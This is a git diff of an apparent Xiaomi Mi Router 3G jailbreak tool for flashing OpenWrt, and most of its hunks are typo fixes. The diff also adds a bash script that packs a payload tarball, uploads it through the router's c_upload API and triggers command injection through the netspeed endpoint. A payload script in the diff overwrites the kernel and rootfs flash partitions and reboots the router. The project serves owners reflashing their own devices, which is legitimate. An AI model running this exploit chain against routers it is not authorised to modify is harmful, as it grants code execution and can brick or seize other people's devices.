diff --git a/README.md b/README.md index 87df7cf..fdcd5d7 100644 --- a/README.md +++ b/README.md @@ -162,3 +162,11 @@ You can find solutions in the following links: ### Version 0.0.1: netcat (legacy) ![Alt Text](readme/exploit-001.gif) + +## A simple bash based version + +**TBD** this is in development and not yet tested. Use it if you know what are you doing. + +If you are on Windows and don't want to install Python you can try the plain shell script to install the OpenWrt. +You still need bash and curl but it comes with Git by default. +Open Bash shell and run: `bash ./setup_openwrt.bash` \ No newline at end of file diff --git a/extras/language/luci b/extras/language/luci index 1ac5a58..8b953c5 100644 --- a/extras/language/luci +++ b/extras/language/luci @@ -30,6 +30,3 @@ config internal 'ccache' config internal 'themes' option xiaoqiang '/xiaoqiang' option OpenWrt '/luci-static/openwrt.org' - -config 5 'debuglevel' - diff --git a/payload/install_openwrt.sh b/payload/install_openwrt.sh new file mode 100644 index 0000000..e078800 --- /dev/null +++ b/payload/install_openwrt.sh @@ -0,0 +1,9 @@ +#!/bin/ash +set -euo pipefail +[ -f ./openwrt-squashfs-kernel1.bin ] || exit +[ -f ./openwrt-squashfs-rootfs0.bin ] || exit +mtd write openwrt-squashfs-kernel1.bin kernel1 +mtd write openwrt-squashfs-rootfs0.bin rootfs0 +nvram set flag_try_sys1_failed=1 +nvram commit +reboot diff --git a/payload/speedtest_urls.xml b/payload/speedtest_urls.xml new file mode 100644 index 0000000..e7c02c1 --- /dev/null +++ b/payload/speedtest_urls.xml @@ -0,0 +1,32 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/remote_command_execution_vulnerability.py b/remote_command_execution_vulnerability.py index d1b1ab8..553f28e 100644 --- a/remote_command_execution_vulnerability.py +++ b/remote_command_execution_vulnerability.py @@ -41,14 +41,14 @@ def get_stok(router_ip_address): try: r0 = requests.get("http://{router_ip_address}/cgi-bin/luci/web".format(router_ip_address=router_ip_address)) except: - print ("Xiaomi router not found...") + print ("Xiaomi router not found.") return None - try: + try: mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0] + key = re.findall(r'key: \'(.*)\',', r0.text)[0] except: - print ("Xiaomi router not found...") + print ("Unable to find deviceId or key.") return None - key = re.findall(r'key: \'(.*)\',', r0.text)[0] nonce = "0_" + mac + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000)) router_password = input("Enter router admin password: ") account_str = hashlib.sha1((router_password + key).encode('utf-8')).hexdigest() @@ -67,8 +67,8 @@ def get_stok(router_ip_address): stok = get_stok(router_ip_address) or input("You need to get the stok manually, then input the stok here: ") print("""There two options to provide the files needed for invasion: - 1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`. - 2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)""") + 1. Use a local TCP file server running on random port to provide files in local directory `script_tools`. + 2. Download needed files from remote github repository. (choose this option only if github is accessible inside router device.)""") use_local_file_server = (input("Which option do you prefer? (default: 1)") or "1") == "1" # From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09 diff --git a/set_english.py b/set_english.py index 0d59b16..fe28036 100644 --- a/set_english.py +++ b/set_english.py @@ -9,12 +9,13 @@ import os import ftplib -router_ip_address = input("Router IP address: ") -# router_ip_address = '192.168.0.21' +router_ip_address = "miwifi.com" +# router_ip_address = "192.168.31.1" +router_ip_address = input("Router IP address: [press enter for using the default '{}']".format(router_ip_address)) or router_ip_address session = ftplib.FTP(router_ip_address,'root','') -# Uploading a lenguage file will not succeed as the filesystem is ro +# Uploading a language file will not succeed as the filesystem is ro # languageFile = open('extras/language/i18n/base.en.lmo','rb') # session.storbinary('STOR /usr/lib/lua/luci/i18n/base.en.lmo', languageFile) # languageFile.close() diff --git a/setup_openwrt.bash b/setup_openwrt.bash new file mode 100755 index 0000000..4a2b5d4 --- /dev/null +++ b/setup_openwrt.bash @@ -0,0 +1,51 @@ +#!/bin/bash +set -euo pipefail +echo "The script will install OpenWrt firmware on the Xiomi router." +echo "First we need to download the OpenWrt for your router model." + +payload_dir=$(mktemp -d) +echo "Files will be downloaded to $payload_dir" + +echo "Please select your model:" +echo "1. Xiomi 3G v1 (with USB) https://openwrt.org/toh/xiaomi/mir3g" +echo "2. Xiomi 3G v2 without USB https://openwrt.org/toh/xiaomi/mir3g" +echo "Type a number:" +read router_model +case "$router_model" in + "1") + echo "Download openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g" + curl -L https://downloads.openwrt.org/releases/22.03.0/targets/ramips/mt7621/openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g-squashfs-kernel1.bin -o "$payload_dir/openwrt-squashfs-kernel1.bin" -z "$payload_dir/openwrt-squashfs-kernel1.bin" + curl -L https://downloads.openwrt.org/releases/22.03.0/targets/ramips/mt7621/openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g-squashfs-rootfs0.bin -o "$payload_dir/openwrt-squashfs-rootfs0.bin" -z "$payload_dir/openwrt-squashfs-rootfs0.bin" + ;; + "2") + echo "Not implemented yet, sorry" + exit 3 + ;; + *) + echo "Your select is wrong" + exit 2 +esac + +echo "Prepare payload.tar.gz" +cp ./payload/* "$payload_dir" +(cd "$payload_dir" && tar -I "gzip -1" -cvf /tmp/payload.tar.gz ./) +echo "The payload.tar.gz is ready for a shot:" +ls -l /tmp/payload.tar.gz + +router_url="http://miwifi.com/cgi-bin/luci/;stok=04a76647de2b1d602d43cd131573f8ac/web/home#router" +echo "" +echo "Now let's install the firmware on the router." +echo "Reset router to it's factory settings with a needle pushed into a Reset hole." +echo "Then connect to it's WiFi and open your router admin panel at http://miwifi.com" +echo "Now set admin and wifi passwords and you'll see a dashboard." +echo "The URL in browser's address bar should look like $router_url" +echo "Now copy and paste here it's URL:" +read router_url +# strip after stok +router_base_url=( $(sed -e 's/\(.*stok=.*\)\/web\(.*\)/\1/' <<< "$router_url") ) +echo router_base_url +curl -v -F 'image=@payload/payload.tar.gz' "$router_base_url/api/misystem/c_upload" +curl -v "$router_base_url/api/xqnetdetect/netspeed" +echo $? +echo "Now the router should reboot itself. Please wait for a minute." +echo "Try to connect with a cable and open OpenWrt Luci admin panel at http://192.168.1.1/" diff --git a/tcp_file_server.py b/tcp_file_server.py index ac430fd..1941a74 100644 --- a/tcp_file_server.py +++ b/tcp_file_server.py @@ -26,7 +26,7 @@ def run(self): self.server_thread = threading.Thread(target=self.server.serve_forever) self.server_thread.daemon = True self.server_thread.start() - print("local file server is runing on {}:{}. root='{}'".format(self.ip, self.port, self.server.root_dir)) + print("local file server is running on {}:{}. root='{}'".format(self.ip, self.port, self.server.root_dir)) def __exit__(self, exc_type, exc_val, exc_tb): self.server.shutdown()